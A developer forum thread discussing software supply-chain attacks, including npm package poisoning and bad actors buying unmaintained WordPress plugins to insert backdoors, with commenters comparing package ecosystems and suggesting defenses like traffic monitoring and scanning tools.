Let's trust random third parties and put their code on our server without any review!
-
Two nice links for your Friday read. (And if it isn't Friday for you right now, go fuck a pinecone).
First, the theoretical. How easily can someone poison npm to harvest form data, and get away unnoticed?
Second, the actual. Supply Chain Attack. Bad actors are going around and buying up moderately popular but unmaintained Wordpress plug-ins. The authors of those plugins will almost always sell, because fuck it, it's code I don't use anymore, and someone wants to give me $500, sure? And since most people will just blindly update a plugin, instead of grabbing the source and doing a diff-- well, now you have a backdoor for your botnet to grow into.
-
@lorne-kates This is a risk with any package manager, not just npm. And it could be even worse with something like nuget because it's not always open source, so you don't really know for sure what they are doing. You just read the reviews and number of downloads and think it's a perfectly legit library (which is almost always is, to be fair, but there is some blind faith involved with some of the lesser known owners of the libraries there). Nuget does do some vetting of their submissions, but I've found that these kinds of analysis is done more on the initial submission, and then they go through a more streamlined process with each update, which may have things go through the cracks.
If your .NET stuff is server-side you can at least mitigate this risk with firewalls and traffic analytics to ensure there aren't any fishy outgoing requests. If you're doing client-side or desktop software, your best bet is to just do testing with fiddler to see if there's any phoning home from your adopted libraries. Obviously hardly anyone does this level of testing, but it might be something to consider if you are dealing with PII and other sensitive data.
-
@the_quiet_one While it certainly can be an issue in nuget for all those reasons, you can get away with a lot less dependencies. Keeping track of 3-4 dependencies is a very different thing from keeping track of the 100,000 included by that one function you imported with npm.
And I know, this is a difference in practice, not a difference in capability: If you use some new version of a Microsoft package that uses features from a framework version you don't have, they will helpfully get you packages that implement all of it. But even then, you're essentially getting more Microsoft packages, and you can bet those are carefully vetted.
My point with all of this echos a point that I think blakey has made, though I can't remember for sure, so I won't attribute him directly: having most of your stuff come from .NET and not NuGet is less difficult than the equivalent in pretty much anything else you use, and is a really good thing.
-
@lorne-kates said in Let's trust random third parties and put their code on our server without any review!:
because fuck it, it's code I don't use anymore, and someone wants to give me $500, sure?
How irresponsible. Do some research before selling, and if you discover the buyer is going to inject malware, ask for $2,000.
-
@anonymous234 said in Let's trust random third parties and put their code on our server without any review!:
rresponsible.
Yes, it is a problem (and the information posted here is just the tip of the iceberg). One thing that helps is to use available tooling that analyzes the package/code usage and reports on known issues. Properly done, this can stop code that uses these packages from ever making it into your repositories.
-
@thecpuwizard ...until some clever haxx0r comes up with an unknown issue, of course.
-
@masonwheeler said in Let's trust random third parties and put their code on our server without any review!:
@thecpuwizard ...until some clever haxx0r comes up with an unknown issue, of course.
Of course, but some of the commercial products are really good :)
Also don't forget about internal hackers - lots of cases where in house developers have hidden malicious code. So adding a mix of these tools to the armory has a benefit there also.
-
@thecpuwizard said in Let's trust random third parties and put their code on our server without any review!:
but some of the commercial products are really good
Of course, if you know what commercial product your target uses, you can get a pirated copy and tweak your malware until it passes.
-
Pfft, I'm already trusting my CPU to Intel, OS to Microsoft, and phone to Google.
From there it can only get better.
-
@anonymous234 said in Let's trust random third parties and put their code on our server without any review!:
@thecpuwizard said in Let's trust random third parties and put their code on our server without any review!:
but some of the commercial products are really good
Of course, if you know what commercial product your target uses, you can get a pirated copy and tweak your malware until it passes.
VERY hard to do. The "tweaks" are almost certain to invalidate at least one of the signatures and change it to "Unverified" rather than "Passing"